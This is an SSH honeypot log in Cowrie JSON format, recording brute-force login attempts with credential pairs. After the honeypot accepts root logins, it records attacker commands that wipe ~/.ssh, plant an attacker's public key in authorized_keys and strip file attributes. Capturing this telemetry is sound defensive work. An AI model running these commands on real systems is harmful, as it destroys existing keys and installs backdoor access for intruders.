{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:46:31.864253Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:46:32.136565Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:32.137435Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":48984,"dst_ip":"1.2.3.4","dst_port":22,"session":"03fcc953a5f9","protocol":"ssh","message":"New connection: 43.156.132.147:48984 (1.2.3.4:22) [session: 03fcc953a5f9]","sensor":"my-vps","timestamp":"2025-09-09T00:46:32.380879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:32.381512Z","src_ip":"43.156.132.147","session":"03fcc953a5f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:32.626739Z","src_ip":"43.156.132.147","session":"03fcc953a5f9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:46:33.646316Z","src_ip":"43.156.132.147","session":"03fcc953a5f9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:34.894742Z","src_ip":"43.156.132.147","session":"03fcc953a5f9"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":49000,"dst_ip":"1.2.3.4","dst_port":22,"session":"890b6b02e753","protocol":"ssh","message":"New connection: 43.156.132.147:49000 (1.2.3.4:22) [session: 890b6b02e753]","sensor":"my-vps","timestamp":"2025-09-09T00:46:35.138850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:35.139709Z","src_ip":"43.156.132.147","session":"890b6b02e753"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:35.384925Z","src_ip":"43.156.132.147","session":"890b6b02e753"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:46:36.406411Z","src_ip":"43.156.132.147","session":"890b6b02e753"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:36.652765Z","src_ip":"43.156.132.147","session":"489dd3c78900"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:36.654159Z","src_ip":"43.156.132.147","session":"890b6b02e753"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":47148,"dst_ip":"1.2.3.4","dst_port":22,"session":"450e81ef9fad","protocol":"ssh","message":"New connection: 5.202.105.236:47148 (1.2.3.4:22) [session: 450e81ef9fad]","sensor":"my-vps","timestamp":"2025-09-09T00:46:41.785216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:46:41.796705Z","src_ip":"5.202.105.236","session":"450e81ef9fad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:46:41.958865Z","src_ip":"5.202.105.236","session":"450e81ef9fad"}
{"eventid":"cowrie.login.failed","username":"boris","password":"0","message":"login attempt [boris/0] failed","sensor":"my-vps","timestamp":"2025-09-09T00:46:42.563594Z","src_ip":"5.202.105.236","session":"450e81ef9fad"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:46:43.723687Z","src_ip":"5.202.105.236","session":"450e81ef9fad"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":35036,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b0eaaaa3c92","protocol":"ssh","message":"New connection: 152.32.129.236:35036 (1.2.3.4:22) [session: 0b0eaaaa3c92]","sensor":"my-vps","timestamp":"2025-09-09T00:47:08.630416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:47:08.631876Z","src_ip":"152.32.129.236","session":"0b0eaaaa3c92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:47:08.830041Z","src_ip":"152.32.129.236","session":"0b0eaaaa3c92"}
{"eventid":"cowrie.login.failed","username":"redis","password":"111111","message":"login attempt [redis/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T00:47:09.663887Z","src_ip":"152.32.129.236","session":"0b0eaaaa3c92"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":36156,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cf9127f8aa8","protocol":"ssh","message":"New connection: 51.250.72.176:36156 (1.2.3.4:22) [session: 4cf9127f8aa8]","sensor":"my-vps","timestamp":"2025-09-09T00:47:10.072016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:47:10.072741Z","src_ip":"51.250.72.176","session":"4cf9127f8aa8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:47:10.112141Z","src_ip":"51.250.72.176","session":"4cf9127f8aa8"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T00:47:10.312566Z","src_ip":"51.250.72.176","session":"4cf9127f8aa8"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:10.864049Z","src_ip":"152.32.129.236","session":"0b0eaaaa3c92"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:11.355208Z","src_ip":"51.250.72.176","session":"4cf9127f8aa8"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":40463,"dst_ip":"1.2.3.4","dst_port":22,"session":"52a42a4d0169","protocol":"ssh","message":"New connection: 103.100.209.195:40463 (1.2.3.4:22) [session: 52a42a4d0169]","sensor":"my-vps","timestamp":"2025-09-09T00:47:34.206471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:47:34.207841Z","src_ip":"103.100.209.195","session":"52a42a4d0169"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:47:34.420186Z","src_ip":"103.100.209.195","session":"52a42a4d0169"}
{"eventid":"cowrie.login.failed","username":"cloud","password":"123","message":"login attempt [cloud/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:47:35.252447Z","src_ip":"103.100.209.195","session":"52a42a4d0169"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:36.470717Z","src_ip":"103.100.209.195","session":"52a42a4d0169"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":43204,"dst_ip":"1.2.3.4","dst_port":22,"session":"cba438a150cc","protocol":"ssh","message":"New connection: 43.156.132.147:43204 (1.2.3.4:22) [session: cba438a150cc]","sensor":"my-vps","timestamp":"2025-09-09T00:47:38.570883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:47:38.571818Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:47:38.841895Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.login.success","username":"root","password":"password2017","message":"login attempt [root/password2017] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:47:39.931132Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:47:40.501014Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:47:40.501700Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:47:40.502641Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:40.780969Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:47:41.439097Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:47:41.439779Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:47:41.706191Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:41.707043Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":43216,"dst_ip":"1.2.3.4","dst_port":22,"session":"eef75fbd49ef","protocol":"ssh","message":"New connection: 43.156.132.147:43216 (1.2.3.4:22) [session: eef75fbd49ef]","sensor":"my-vps","timestamp":"2025-09-09T00:47:41.970008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:47:41.970841Z","src_ip":"43.156.132.147","session":"eef75fbd49ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:47:42.246873Z","src_ip":"43.156.132.147","session":"eef75fbd49ef"}
